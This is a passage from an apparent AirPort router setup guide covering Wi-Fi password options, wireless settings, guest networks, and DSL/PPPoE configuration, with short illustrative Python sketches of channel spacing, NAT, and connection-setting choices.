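        if channels_between(chan_a, chan_b) < MIN_CHANNELS_BETWEEN
    ]


if __name__ == "__main__":
    print(conflicts({"A": 1, "B": 6, "C": 11}))
    print(conflicts({"A": 1, "B": 3}))
```

Channels 1 and 6 have channels 2 through 5 between them, which is exactly the minimum of four.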
Password-protect Your Network

To password-protect your network, you can choose from a number of wireless security options. In the AirPort pane of AirPort Utility, click Wireless and choose one of the following options from the Wireless Security pop-up menu:
• None: Choosing this option turns off all password protection for the network. Any computer with a wireless adapter or card can join the network, unless the network is set up to use access control. See “Setting Up Access Control” on page 47.
• WEP: If your device supports it, choose this option and enter a password to protect your network with a Wired Equivalent Privacy (WEP) password. Your Apple wireless device supports 40-bit and 128-bit encryption. To use 40-bit WEP, don’t use an 802.11n radio mode.
• WPA/WPA2 Personal: Choose this option to protect your network with Wi-Fi Protected Access. You can use a password between 8 and 63 ASCII characters or a Pre-Shared Key of exactly 64 hexadecimal characters. Computers that support WPA and computers that support WPA2 can join the network. Choose WPA2 Personal if you want only computers that support WPA2 to join your network.
• WPA/WPA2 Enterprise: Choose this option if you’re setting up a network that includes an authentication server, such as a RADIUS server, with individual user accounts. Enter the IP address and port number for the primary and optional secondary server, and enter a “shared secret,” which is the password for the server. Choose WPA2 Enterprise if you want only computers that support WPA2 to join the network.
• WEP (Transitional Security Network): If your device supports it, you can use this option to allow computers using WPA or WPA2 to join the network. Computers or devices that use WEP can also join the network. WEP (Transitional Security Network) supports 128-bit encryption. To use this option, the wireless device must use an 802.11n radio mode.
Hold the Option key on your keyboard while clicking the Wireless Security pop-up menu to use WEP (Transitional Security Network).

For more information and instructions for setting up WPA or WPA2 on your network, see “Using Wi-Fi Protected Access” on page 45.

Setting Wireless Options

Click Wireless Options to set additional options for your network.

Setting Additional Wireless Options

Use the Wireless Options pane to set the following:
• 5 GHz network name: Provide a name for the 5 GHz segment of the dual-band network if you want it to have a different name than the 2.4 GHz network.
• Country: Choose the country for the location of your network from the Country pop-up menu.
• Multicast rate: Choose a multicast rate from the pop-up menu. If you set the multicast rate high, only clients on the network that are within range and can achieve the speed you set will receive transmissions.
• Transmit power: Choose a setting from the Transmit Power pop-up menu to set the network range (the lower the percentage, the shorter the network range).
• WPA Group Key Timeout: Enter a number in the text field, and choose an increment from the pop-up menu to change the frequency of key rotation.
• Use Wide Channels: If you set up your network to use the 5 GHz frequency range, you can use wide channels to provide higher network throughput.
Note: Using wide channels is not permitted in some countries.
• Create a closed network: Selecting a closed network hides the name of the network so that users must enter the exact network name and password to join the AirPort Extreme network.
• Use interference robustness: Interference robustness can solve interference problems caused by other devices or networks.

To set more advanced security options, see “Keeping Your Network Secure” on page 45.

Setting Up a Guest Network

Click Guest Network and then enter the network name and other options for the guest network.
When you set up a guest network, a portion of your connection to the Internet is reserved for “guests”, wireless clients that can join the guest network and connect to the Internet without accessing your private network.

Select “Allow guest network clients to communicate with each other” to allow client computers to share files and services with each other while they’re connected to the guest network. Make sure sharing services are set up on the client computers.

Configuring and Sharing Internet Access

The next step is setting up your wireless device’s Internet connection and sharing its Internet access with client computers. The following sections tell you what to do, depending on how your device connects to the Internet.

You’re Using a DSL or Cable Modem

In most cases, you can implement this network design using AirPort Utility and following the onscreen instructions to set up your wireless device and network. You need to use AirPort Utility to manually set up your device only if you want to set up or adjust optional advanced settings.

What It Looks Like

How It Works

• The Apple wireless device (in this example, a Time Capsule) connects to the Internet through its Internet WAN (<) connection to your DSL or cable modem.
• Computers using AirPort or computers connected to the wireless device’s Ethernet LAN port (G) connect to the Internet through the device.
• The device is set up to use a single, public IP address to connect to the Internet, and uses DHCP and NAT to share the Internet connection with computers on the network using private IP addresses.
• AirPort computers and Ethernet computers communicate with one another through the wireless device.

Important: Connect Ethernet computers that are not connected to the Internet to the device’s LAN port (G) only. Since the device can provide network services, you must set it up carefully to avoid interfering with other services on your Ethernet network.
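The sharing of a single public IP address through NAT, described under How It Works, can be pictured as a translation table. The Python sketch below is a toy model under stated assumptions: the class name, the starting port, and all addresses are hypothetical, and a real NAT also tracks protocol, remote endpoint, and timeouts. It shows two private clients sharing one public address, and an unsolicited inbound port finding no mapping, which is the firewall-like effect mentioned earlier in the guide.

```python
import ipaddress
from itertools import count


class TinyNat:
    """Toy translation table for one public address (illustration only)."""

    def __init__(self, public_ip, first_port=49152):
        self.public_ip = ipaddress.ip_address(public_ip)
        self._ports = count(first_port)
        self._out = {}  # (private_ip, private_port) -> public_port
        self._in = {}   # public_port -> (private_ip, private_port)

    def outbound(self, private_ip, private_port):
        """Map a private endpoint to the shared public address and a port."""
        key = (ipaddress.ip_address(private_ip), private_port)
        if key not in self._out:
            port = next(self._ports)
            self._out[key] = port
            self._in[port] = key
        return (self.public_ip, self._out[key])

    def inbound(self, public_port):
        """Return the private endpoint for a public port, or None if unmapped."""
        return self._in.get(public_port)


if __name__ == "__main__":
    nat = TinyNat("203.0.113.7")          # documentation-range address
    print(nat.outbound("10.0.1.2", 5000))
    print(nat.outbound("10.0.1.3", 5000))
    print(nat.inbound(60000))             # no mapping exists for this port
```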
[Diagram for “What It Looks Like”, labels: DSL or cable modem; to Internet; to Ethernet port; Time Capsule; Ethernet WAN port (<); 2.4 or 5 GHz]

What You Need for a DSL or Cable Modem Connection

Component: Internet account with DSL or cable modem service provider
Check: Does your service provider use a static IP or DHCP configuration?
Comments: You can get this information from your service provider or the Network preferences pane on the computer you use to access the Internet through this service provider.

Component: Apple wireless device (an AirPort Extreme Base Station, an AirPort Express, or a Time Capsule)
Check: Place the device near your DSL or cable modem.

What to Do

If you’re using AirPort Utility to assist you with configuring the Apple wireless device for Internet access:
1 Open AirPort Utility, located in the Utilities folder in the Applications folder on a Mac, or in Start > All Programs > AirPort on a Windows computer.
2 Follow the onscreen instructions and enter the settings you received from your service provider to connect to the Internet, and then set up the device to share the Internet connection with computers on the network.

If you’re using AirPort Utility to manually set up your wireless device:
1 Make sure that your DSL or cable modem is connected to the Ethernet WAN port (<) on your Apple wireless device.
2 Open AirPort Utility, located in the Utilities folder in the Applications folder on a Mac, or in Start > All Programs > AirPort on a Windows computer. Select your wireless device and choose Base Station > Manual Setup, or double-click your device’s icon in the list to open the configuration in a separate window.
3 Click the Internet button. Click Internet Connection and choose Ethernet or PPPoE from the Connect Using pop-up menu, depending on which one your service provider requires. If your service provider gave you PPPoE connection software, such as EnterNet or MacPoET, choose PPPoE.
Note: If you’re connecting to the Internet through a router using PPPoE and your Apple wireless device is connected to the router via Ethernet, you do not need to use PPPoE on your wireless device. Choose Ethernet from the Connect Using pop-up menu in the Internet pane, and deselect the “Distribute IP addresses” checkbox in the Network pane. Contact your service provider if you aren’t sure which one to select.
4 Choose Manually or Using DHCP from the Configure IPv4 pop-up menu if you chose Ethernet from the Connect Using pop-up menu, depending on how your service provider provides IP addresses.
• If your provider gave you an IP address and other numbers with your subscription, use that information to configure the wireless device IP address manually. If you aren’t sure, ask your service provider. Enter the IP address information in the fields below the Configure IPv4 pop-up menu.
• If you chose PPPoE, your ISP provides your IP address automatically using DHCP.

If your service provider asks you for the MAC address of your wireless device, use the address of the Ethernet WAN port (<), printed on the label on the bottom of the device.

If you’ve already used AirPort Utility to set up your wireless device, the fields below the Configure IPv4 pop-up menu may already contain the information appropriate for your service provider.

You can change the WAN Ethernet speed if you have specific requirements for the network you’re connected to. In most cases, the settings that are configured automatically are correct. Your service provider should be able to tell you if you need to adjust these settings.

Changing the WAN Ethernet speed can affect the way the wireless device interacts with the Internet. Unless your service provider has given you specific settings, use the automatic settings. Entering the wrong settings can affect network performance.

Contact your service provider for the information you should enter in these fields.
[Figure callout: Use this pop-up menu if you need to adjust the speed of the Ethernet WAN port.]

If you configure TCP/IP using DHCP, choose Using DHCP from the Configure IPv4 pop-up menu. Your IP information is provided automatically by your ISP using DHCP.

5 If you chose PPPoE from the Connect Using pop-up menu, enter the PPPoE settings your service provider gave you. Leave the Service Name field blank unless your service provider requires a service name.

Note: With AirPort, you don’t need to use a third-party PPPoE connection application. You can connect to the Internet using AirPort.

[Figure callout: Your service provider may require you to enter information in these fields. Contact your service provider for the information you should enter in these fields.]

If you’re connecting to the Internet through a router that uses PPPoE to connect to the Internet, and your wireless device is connected to the router via Ethernet, you do not need to use PPPoE on your device. Choose Ethernet from the Connect Using pop-up menu in the Internet pane, and deselect the “Distribute IP addresses” checkbox in the Network pane. Because your router is distributing IP addresses, your wireless device doesn’t need to. More than one device on a network providing IP addresses can cause problems.

6 Click PPPoE to set PPPoE options for your connection.

• Choose Always On, Automatic, or Manual, depending on how you want to control when your wireless device is connected to the Internet. If you choose Always On, your device stays connected to your modem and the Internet as long as the modem is turned on. If you choose Automatic, the wireless device connects to the modem, which connects to the Internet when you use an application that requires an Internet connection, such as email or an instant message or web application. If you choose Manual, you need to connect the modem to the Internet when you use an application that requires an Internet connection.

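The choices described for the Connect Using and Configure IPv4 pop-up menus can be summarized as a small decision sketch. This is only an illustration in Python and is not part of AirPort Utility: the names ProviderInfo and recommend_settings, and the dictionary keys, are hypothetical and chosen for this example. The values mirror the menu labels used in the steps.

```python
from dataclasses import dataclass


@dataclass
class ProviderInfo:
    """Facts you collect from your service provider (hypothetical structure)."""
    requires_pppoe: bool               # provider gave you PPPoE settings or software
    static_ip: bool                    # provider gave you a fixed IP address
    behind_pppoe_router: bool = False  # an upstream router already handles PPPoE


def recommend_settings(info: ProviderInfo) -> dict:
    """Return the menu choices suggested by the steps (illustrative only)."""
    # PPPoE is chosen on the wireless device only when no upstream router
    # is already making the PPPoE connection.
    if info.requires_pppoe and not info.behind_pppoe_router:
        # With PPPoE, the ISP assigns the IP address automatically,
        # so there is no Configure IPv4 choice to make.
        return {"connect_using": "PPPoE", "configure_ipv4": None}

    settings = {
        "connect_using": "Ethernet",
        # Manual configuration applies only if the provider supplied an address.
        "configure_ipv4": "Manually" if info.static_ip else "Using DHCP",
    }
    if info.behind_pppoe_router:
        # The router already hands out addresses, so the wireless device
        # should not distribute them as well.
        settings["distribute_ip_addresses"] = False
    return settings


if __name__ == "__main__":
    print(recommend_settings(ProviderInfo(requires_pppoe=True, static_ip=False)))
```

If you are unsure of any of the inputs, the guidance in the steps still applies: ask your service provider before entering settings.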
If you chose Automatic or Manual from the Connection pop-up menu, you need to choose an increment, such as “10 minutes,” from the “Disconnect if idle” pop-up menu. If you don’t use an Internet application after the increment of time has passed, you’ll be disconnected f